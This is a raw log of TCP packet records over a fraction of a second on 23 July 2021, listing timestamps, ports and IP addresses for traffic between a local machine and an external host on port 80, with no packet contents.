Jul 23, 2021 22:24:24.651937008 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651938915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651948929 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.651964903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651983976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.651998997 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652007103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652025938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652035952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652048111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652070045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652077913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652092934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652121067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652218103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652240038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652261972 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652282953 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652285099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652309895 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652316093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652338982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652355909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652374029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652395964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652396917 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652420998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652434111 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652443886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652466059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652486086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652488947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652509928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652532101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652551889 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652554035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652576923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652600050 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652601004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652625084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652641058 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652642012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652659893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652677059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652688980 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652702093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652723074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652746916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652748108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652767897 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652772903 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652786016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652803898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652825117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652828932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652848005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652864933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652872086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652887106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652895927 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652905941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652925014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652930975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652950048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652971983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.652987003 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.652990103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653007984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653028965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653043985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653048038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653069019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653076887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653090954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653112888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653130054 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653130054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653152943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653173923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653192997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653193951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653218031 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653218031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653240919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653250933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653259039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653278112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653299093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653311968 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653321981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653338909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653357029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653364897 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653373003 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653379917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653398037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653419971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653428078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653441906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653465033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653487921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653506041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653527975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653547049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653568983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653589010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653606892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653625965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653642893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653666019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653687000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653693914 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653702021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653703928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653706074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653706074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653723955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653747082 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653765917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653779030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653789043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653810978 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653825045 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653835058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653856993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653863907 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653878927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653904915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653927088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653935909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.653950930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653968096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653990030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.653994083 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654010057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654031992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654043913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654050112 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654053926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654073000 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654078007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654099941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654125929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654149055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654170036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654179096 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654192924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654194117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654205084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654217005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654239893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654262066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654295921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654297113 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654319048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654340982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654364109 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654388905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654412031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654433966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654457092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654416084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654479027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654500008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654522896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654504061 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654545069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654570103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654592037 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654592991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654614925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654637098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654659033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654680014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654680014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654701948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654726028 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654751062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654774904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654773951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654795885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654818058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654820919 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654839039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654860973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654884100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654865026 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654906034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654931068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654954910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.654957056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.654975891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.655003071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655035019 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655136108 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655304909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655311108 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655313969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655317068 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655319929 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.655323029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.673307896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.673345089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.673372030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.673388004 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.673417091 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.673443079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674096107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674129963 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674159050 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674190998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674238920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674284935 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674289942 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674319983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674351931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674375057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674381971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674397945 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674407959 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674416065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674429893 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674448967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674453974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674478054 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674504995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674509048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674540043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674540043 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674570084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674599886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674597025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674612045 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674619913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674626112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674654961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674657106 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674678087 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674683094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674695015 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674707890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674734116 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.674738884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674757957 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.674782038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.683701992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.683801889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.683840990 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.683860064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.683865070 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.683928967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684061050 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684123993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684132099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684221029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684225082 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684277058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684283018 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684325933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684355021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684380054 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684412003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.684416056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684442997 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.684463978 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686517954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686551094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686573982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686594009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686594009 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686619043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686624050 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686641932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686664104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686678886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686686993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686705112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686711073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686723948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686742067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686765909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686783075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686803102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686825037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686844110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686863899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686887980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686908007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686918020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686932087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686949015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686970949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.686985016 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.686990023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687005997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687021017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687031031 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687041998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687062979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687086105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687088013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687109947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687112093 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687144041 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687146902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687166929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687181950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687196970 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687206030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687216043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687232971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687241077 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687248945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687266111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687280893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687292099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687304020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687305927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687313080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687367916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687382936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687401056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687403917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687423944 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687427044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687428951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687447071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687448025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687465906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687488079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687468052 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687510014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687510967 CEST	80	49750	45.144.225.135	192.168.2.4
